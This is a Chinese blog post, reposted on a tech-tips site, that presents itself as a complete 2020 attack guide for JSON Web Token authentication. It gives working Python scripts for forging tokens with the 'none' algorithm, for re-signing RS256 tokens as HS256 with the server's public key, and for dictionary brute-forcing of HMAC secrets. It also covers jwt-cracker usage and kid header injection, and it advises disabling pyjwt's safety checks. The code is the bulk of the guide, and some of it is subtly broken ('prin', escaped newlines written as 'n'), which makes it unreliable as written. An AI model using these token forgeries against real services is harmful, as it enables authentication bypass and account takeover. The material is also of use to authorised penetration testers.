您当前的位置:首页 > 电脑百科 > 安全防护 > 软件工具

Json Web Token 2020 攻击指南

时间:2020-12-30 11:29:52  来源:  作者:
Json Web Token 2020 攻击指南

 

最近工作中测试一款客户端exe程序,web框架基于CEF,认证用的是jwt。说实话jwt这个东西实际运用真的很少,前几年完整撸过一次,结果这次又碰到了就基本忘光了之前的测试过程和方向,于是又重新学习,在查阅了大量的国内以及国外文献后,经过大量的代码编写以及测试,写下此篇攻击指南

可以很负责任的说,目前针对 jwt 攻击测试的方案

有且仅有以下几种:

  • 重置空加密算法
  • 非对称加密向下降级为对称加密
  • 暴力破解密钥
  • 篡改 jwt header,kid指定攻击

JWT 在线解析地址:https://jwt.io/


重置空加密算法

如图,当前 jwt 指定的 alg 为 HS256 算法

Json Web Token 2020 攻击指南

 

将其修改为none,然后输出(如果没有 jwt 模块,需要 pip install pyjwt 一下)

import jwt

print(jwt.encode({"userName":"admin","userRoot":1001}, key="", algorithm="none"))
Json Web Token 2020 攻击指南

 

删掉最后的 “.” ,然后带入原有的数据包进行发包测试,看 server 端是否接受 none 算法,从而绕过了算法签名。


非对称加密向下降级为对称加密

现在大多数应用使用的算法方案都采用 RSA 非对称加密,server 端保存私钥,用来签发 jwt,对传回来的 jwt 使用公钥解密验证。

碰到这种情况,我们可以修改 alg 为 HS256 对称加密算法,然后使用我们可以获取到的公钥作为 key 进行签名加密,这样一来,当我们将 jwt 传给 server 端的时候,server 端因为默认使用的是公钥解密,而算法为修改后的 HS256 对称加密算法, 所以肯定可以正常解密解析,从而绕过了算法限制。

当 server 端严格指定只允许使用 Hmac 或者 RSA 算法其中一种时候,那这种攻击手段是没有效果的。

附上降级转型的 Python 代码:

import jwt
import sys
import re
import argparse


class HMACAlgorithm(jwt.algorithms.HMACAlgorithm):
    def prepare_key(self, key):
        key = jwt.utils.force_bytes(key)
        return key

jwt.api_jwt._jwt_global_obj._algorithms['HS256'] = 
        HMACAlgorithm(HMACAlgorithm.SHA256)

parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='''Re-sign a JWT with a public key,
        changing its type from RS265 to HS256.''')
parser.add_argument('-j', '--jwt-file', dest='jwt_file',
        default='jwt.txt', metavar='FILE',
        help='''File containing the JWT.''')
parser.add_argument('-k', '--key-file', dest='keyfile',
        default='key.pem', metavar='FILE',
        help='''File containing the public PEM key.''')
parser.add_argument('-a', '--algorithm', dest='algorithm',
        default='RS256', metavar='ALGO',
        help='''Original algorithm of the JWT.''')
parser.add_argument('-n', '--no-vary', dest='no_vary',
        default=False, action='store_true',
        help='''Sign only once with the exact key given.''')
args = parser.parse_args()

with open(args.keyfile, 'r') as f:
    try:
        pubkey = f.read()
    except: 
        sys.exit(2)

with open(args.jwt_file, 'r') as f:
    try:
        token = f.read().translate(None, 'n ')
    except: 
        sys.exit(2)

try:
    jwt.decode(token, pubkey, algorithms=args.algorithm)
except jwt.exceptions.InvalidSignatureError:
    sys.stderr.write('Wrong public key! Aborting.')
    sys.exit(1)
except: 
    pass

claims = jwt.decode(token, verify=False)
headers = jwt.get_unverified_header(token)
del headers['alg']
del headers['typ']

if args.no_vary:
    sys.stdout.write(jwt.encode(claims, pubkey, algorithm='HS256',
                headers=headers).decode('utf-8'))
    sys.exit(0)

lines = pubkey.rstrip('n').split('n')
if len(lines) < 3:
    sys.stderr.write('''Make sure public key is in a PEM format and
            includes header and footer lines!''')
    sys.exit(2)

hdr = pubkey.split('n')[0]
ftr = pubkey.split('n')[-1]
meat = ''.join(pubkey.split('n')[1:-1])

sep = 'n-----------------------------------------------------------------n'
for l in range(len(hdr), len(meat)+1):
    secret = 'n'.join([hdr] + filter(
        None,re.split('(.{%s})' % l, meat)) + [ftr])
    sys.stdout.write(
            '%s--- JWT signed with public key split at lines of length %s: ---%s%s' % 
            (sep, l, sep, jwt.encode(claims, secret, algorithm='HS256',
                headers=headers).decode('utf-8')))
    secret += 'n'
    sys.stdout.write(
            '%s------------- As above, but with a trailing newline: ------------%s%s' % 
            (sep, sep, jwt.encode(claims, secret, algorithm='HS256',
                headers=headers).decode('utf-8')))

注意,因为jwt模块更新后,防止滥用,加入了强校验,如果指定算法为 HS256 而提供 RSA 的公钥作为 key 时会报错,无法往下执行,需要注释掉 site-packages/jwt/algorithm.py 中的如下四行:

Json Web Token 2020 攻击指南

 

再把整个python代码流程精简一下,使用以下脚本即可,public.pem 为 RSA 公钥:

# -*- coding: utf-8 -*-

import jwt

public = open('public.pem', 'r').read()
prin(jwt.encode({"user":"admin","id":1}, key=public, algorithm='HS256'))
Json Web Token 2020 攻击指南

 


暴力破解密钥

当 alg 指定 HMAC 类对称加密算法时,可以进行针对 key 的暴力破解

其核心原理即为 jwt 模块的 decode 验证模式,

jwt.decode(jwt_json, verify=True, key='')
  1. 签名直接校验失败,则 key 为有效密钥;
  2. 因数据部分预定义字段错误:
  • jwt.exceptions.ExpiredSignatureError
  • jwt.exceptions.InvalidAudienceError
  • jwt.exceptions.InvalidIssuedAtError
  • jwt.exceptions.InvalidIssuedAtError
  • jwt.exceptions.ImmatureSignatureError导致校验失败,说明并非密钥错误导致,则 key 也为有效密钥;
  1. 因密钥错误jwt.exceptions.InvalidSignatureError导致校验失败,则 key 为无效密钥;
  2. 因其他原因(如,jwt 字符串格式错误)导致校验失败,无法验证当前 key 是否有效。

综上分析,构造字典爆破脚本:

import jwt

jwt_json='eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4iLCJpZCI6MX0.S5iudTeUBkKZa2Ah_MR_JdAsSBUFrnF3kn1FL-Cvsks'
with open('dict.txt',encoding='utf-8') as f:
        for line in f:
            key = line.strip()
            try:
                jwt.decode(jwt_json,verify=True,key=key,algorithm='HS256')
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.InvalidSignatureError):
                print('verify key! -->' + key)
                continue
        else:
            print("key not found!")

运行后可以看到,成功爆破了 key 为 abc123

Json Web Token 2020 攻击指南

 

如果没有字典,可以采取暴力遍历,可以直接使用 npm 安装 jwt-cracker , 方便快捷

npm install jwt-cracker

使用方法:

> jwt-cracker "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4iLCJpZCI6MX0.S5iudTeUBkKZa2Ah_MR_JdAsSBUFrnF3kn1FL-Cvsks" "abcde0123456" 6
Json Web Token 2020 攻击指南

 


篡改 jwt header,kid指定攻击

kid 即为 key ID ,存在于 jwt header 中,是一个可选的字段,用来指定加密算法的密钥

Json Web Token 2020 攻击指南

 

如图,在头部注入新的 kid 字段,并指定 HS256 算法的 key 为 1,生成新的 jwt_json

jwt.encode({"name":"admin","id":1},key="1",algorithm='HS256',headers={"kid":"1"})
Json Web Token 2020 攻击指南

 

验证没有问题:

Json Web Token 2020 攻击指南

 

如果 server 端开启了头部审查,那么此方法也将没有效果

另外,可以构造 kid 进行 SQL注入、任意文件读取、命令执行等攻击,但是除了 CTF 中会有这种强行弱智写法,实际案例可以说是并不存在,实用性极其低,故不再赘述。


小结

以上四种攻击方式可以说是涵盖了已知所有的针对 jwt 的利用,还有一部分没有实际用处或者根本就不存在的东西,没有必要去浪费笔墨,读者也没有必要来浪费时间看。



Tags:Json Web Token   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
最近工作中测试一款客户端exe程序,web框架基于CEF,认证用的是jwt。说实话jwt这个东西实际运用真的很少,前几年完整撸过一次,结果这次又碰到了就基本忘光了之前的测试过程和方向...【详细内容】
2020-12-30  Tags: Json Web Token  点击:(170)  评论:(0)  加入收藏
什么是JWTJson web token(JWT)是为了网络应用环境间传递声明而执行的一种基于JSON的开发标准(RFC 7519),该token被设计为紧凑且安全的,特别适用于分布式站点的单点登陆(SSO)场景。JW...【详细内容】
2019-12-30  Tags: Json Web Token  点击:(92)  评论:(0)  加入收藏
▌简易百科推荐
已经观察到一种新的基于JavaScript的远程访问木马(RAT)利用社会工程学传播,采用隐蔽的"无文件"技术作为其逃避检测和分析的方法。该恶意软件由Prevalyion的对抗性反情报团队(PA...【详细内容】
2021-12-17  网安老葫    Tags:恶意软件   点击:(13)  评论:(0)  加入收藏
关于windows Defender防病毒的问题升级win10后,我们会经常遇到打开或下载文件时弹出提示框提示你下载的文件是病毒之类,直接给你删除。你好不容易找了个激活工具,你刚打开发现...【详细内容】
2021-11-08  IT小哥吧    Tags:defender   点击:(46)  评论:(0)  加入收藏
喽!大家好,我是小易,欢迎来到我的知识分享站!今天给大家分享5个杀毒神器,让你的电脑干干净净,建议收藏起来哟! 1、Windows Defender随着Win10系统的更新已经日趋完善,它可以很好的解...【详细内容】
2021-11-08  知识与技能    Tags:流氓软件   点击:(74)  评论:(0)  加入收藏
介绍其实Iptables服务不是真正的防火墙,只是用来定义防火墙规则功能的"防火墙管理工具",将定义好的规则交由内核中的netfilter即网络过滤器来读取,从而真正实现防火墙功能。fil...【详细内容】
2021-10-18  互联网IT技术全栈    Tags:   点击:(52)  评论:(0)  加入收藏
什么是Nessus?Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件步骤如下:查看当前kali系统内核版本...【详细内容】
2021-09-09  TestGO    Tags:Nessus   点击:(112)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  80后IT老民工    Tags:渗透   点击:(225)  评论:(0)  加入收藏
一、杀软常见的三种方式二、免杀的三种常用方式三、利用工具实现免杀1、veil工具基础实现免杀+进阶2、venom免杀3、利用kali自带的shellter进行免杀4、利用avet实现免杀四、...【详细内容】
2021-08-18  白帽hacker淬炼    Tags:免杀   点击:(81)  评论:(0)  加入收藏
关于工具现有工具现在,现成的污点分析工具已经有很多了。其中,我最感兴趣的是Triton和bincat,因为两者已经相当成熟。然而,我们却无法使用这两种工具,因为它们不支持目标设备所...【详细内容】
2021-08-12  Hbo涵    Tags:安全漏洞   点击:(93)  评论:(0)  加入收藏
从实现原理上分,防火墙的技术包括四大类:网络级防火墙、应用级网关、电路级网关和规则检查防火墙。1、网络级防火墙一般是基于源地址和目的地址、应用、协议以及每个IP包的端...【详细内容】
2021-07-20  趣谈文化  搜狐号  Tags:防火墙   点击:(225)  评论:(0)  加入收藏
一、VMware部分1、Vmware简介虚拟机就是一个用来模拟真实的物理机环境的一个软件,可以在虚拟机中安装不同版本的操作系统。就是一个把下载好的ISO安装在物理机操作系统的一个...【详细内容】
2021-07-12  Kali与编程  公众号  Tags:Kali Linux   点击:(112)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条